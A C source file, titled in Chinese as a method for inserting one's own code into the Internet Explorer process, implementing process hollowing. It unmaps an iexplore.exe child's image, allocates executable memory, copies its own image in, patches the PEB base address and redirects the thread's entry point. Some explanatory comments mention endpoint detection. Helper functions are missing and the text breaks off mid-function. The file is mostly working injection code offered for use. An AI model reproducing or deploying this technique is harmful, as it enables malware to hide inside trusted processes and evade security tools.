把自身插入到IE进程里的代码的办法[网络技术]
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")
/* <windows.h> does not declare NTSTATUS for user-mode code; the caller below
   treats a zero return (STATUS_SUCCESS) as success. */
typedef long NTSTATUS;
/* Undocumented ntdll export, resolved through the ntdll.lib pragma above.
   Unmapping the primary image of a different process (here the child created
   by CreateInjectProcess) is the defining step of process hollowing; endpoint
   detection typically alerts on a user process calling this against a child
   it has just created, followed by the VirtualAllocEx/WriteProcessMemory
   pattern used later in this file. */
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle,
PVOID BaseAddress
);
/* Per-child state filled in by CreateInjectProcess(). In the visible code only
   dwBaseAddress is read (as the unmap target and in the relocation check);
   what dwReserve holds is not shown here. */
typedef struct _ChildProcessInfo
{
DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS;
// Filled by FindIePath(); compared against this module's own path in InjectProcess().
char szIePath[MAX_PATH];
// dwBuffSize is not consulted by the definition below; the only caller passes NULL.
BOOL FindIePath(char *IePath,int *dwBuffSize);
BOOL InjectProcess(void);
// Definition not in view; presumably reads the PE headers of hModule — TODO confirm.
DWORD GetSelfImageSize(HMODULE hModule);
/* Definition not in view. From its use, it is expected to fill pi, the thread
   context and the child descriptor; treat the exact contract as unverified. */
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);
/* Entry point. InjectProcess() returns FALSE when this executable's own path
   already equals the iexplore.exe path it looks up, or when its own module
   handle cannot be obtained; that is the branch that shows the message box.
   Any other outcome prints the banner. Always exits with 0. */
int main(void)
{
    const BOOL injected = InjectProcess();
    if (!injected)
    {
        MessageBox(NULL,"进程插入完成","Text",MB_OK);
        return 0;
    }
    printf("This is my a test code,made by shadow3.\r\n");
    return 0;
}
/* Builds a hard-coded iexplore.exe path on the system drive and copies it into
   IePath. The drive letter and colon are taken from the system directory; the
   remainder is a fixed literal. dwBuffSize is ignored, the result of
   GetSystemDirectory() is not checked, and the function always returns TRUE.
   IePath is assumed to hold at least MAX_PATH bytes. */
BOOL FindIePath(char *IePath,int *dwBuffSize)
{
    char drivePrefix[MAX_PATH];
    (void)dwBuffSize;
    GetSystemDirectory(drivePrefix,MAX_PATH);
    /* Keep only "X:" from e.g. "X:\WINDOWS\system32". */
    drivePrefix[2] = '\0';
    lstrcpy(IePath, drivePrefix);
    lstrcat(IePath,"\\ProgramFiles\\Internet Explorer\\iexplore.exe");
    return TRUE;
}
BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;
STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;
HMODULE hModule = NULL;
ZeroMemory(szModulePath,MAX_PATH);
ZeroMemory(szIePath,MAX_PATH);
GetModuleFileName(NULL,szModulePath,MAX_PATH);
FindIePath(szIePath,NULL);
if ( lstrcmpiA(szIePath,szModulePath) == 0 )
{
return FALSE;
}
hModule = GetModuleHandle(NULL);
if ( hModule == NULL )
{
return FALSE;
}
pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);
dwImageSize = GetSelfImageSize(hModule);
if ( CreateInjectProcess(&pi, &ThreadCxt ,&stChildProcess) )
{
printf("CHILD PID: [%d]\r\n",pi.dwProcessId);
if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 )
{
lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE
);
if ( lpVirtual )
{
printf("Unmapped and Allocated Mem Success.\r\n");
}
}
else
{
printf("ZwUnmapViewOfSection() failed.\r\n");
return TRUE;
}
if ( lpVirtual )
{
PPEB = (DWORD *)ThreadCxt.Ebx;
// 重写装载地址
WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
);
if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) )
{
printf("image inject into process success.\r\n");
ThreadCxt.ContextFlags = CONTEXT_FULL;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )
{
ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
else
{
ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}
#ifdef DEBUG